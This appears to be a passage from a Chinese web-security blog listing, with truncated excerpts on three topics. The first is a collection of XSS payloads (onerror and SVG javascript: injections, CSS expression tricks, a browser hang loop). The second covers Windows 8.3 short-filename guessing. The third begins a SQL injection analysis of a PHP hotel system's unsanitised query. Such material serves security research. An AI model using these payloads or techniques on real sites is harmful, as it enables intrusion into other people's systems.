整理了一些 XSS 跨站代码

<!-- " --!><input value="><img src=xx:x onerror=alert(1)//"> <script/onload=alert(1)></script> IE9 <style/onload=alert(1)> alert([0x0D]-->[0x0D]1<!--[0x0D]) 1<!--i document.write('<img src="<iframe/onload=alert(1)>\0">'); IE8 JSON.parse('{"__proto__":["a",1]}') location++ IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊) alert('aaa\0bbb') IE only show aaa http://jsbin.com/emekog <svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera Function('alert(arguments.callee.caller)')() firefox dos? while(1)find(); <div/style=x:expression(alert(URL=1))> Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode! <applet

Windows short filenames “漏洞”、利用 Windows 短文件名猜文件

http://www.exploit-db.com/wp-content/themes/exploit/docs/19527.pdf http://www.acunetix.com/blog/web-security-zone/articles/windows-short-8-3-filenames-web-security-problem/ 文档已经说得很清楚了,简单的说下: 通过* ? ~组合可以猜目录名和文件名,使用short filenames文件名,可以直接访问文件。 用这个方

hotelphpweb SQL injection

phpweb下的一套酒店系统。 news/html/index.php //定义模块名和页面名 PageSet("news","detail"); 跟踪PageSet函数。 function pageset( $coltype, $pagename ) { global $GLOBALS['msql']; $msql->query( "select * from {P}_base_pageset where coltype='{$coltype}' and pagename='{$pagename}'" ); //....省略代码N行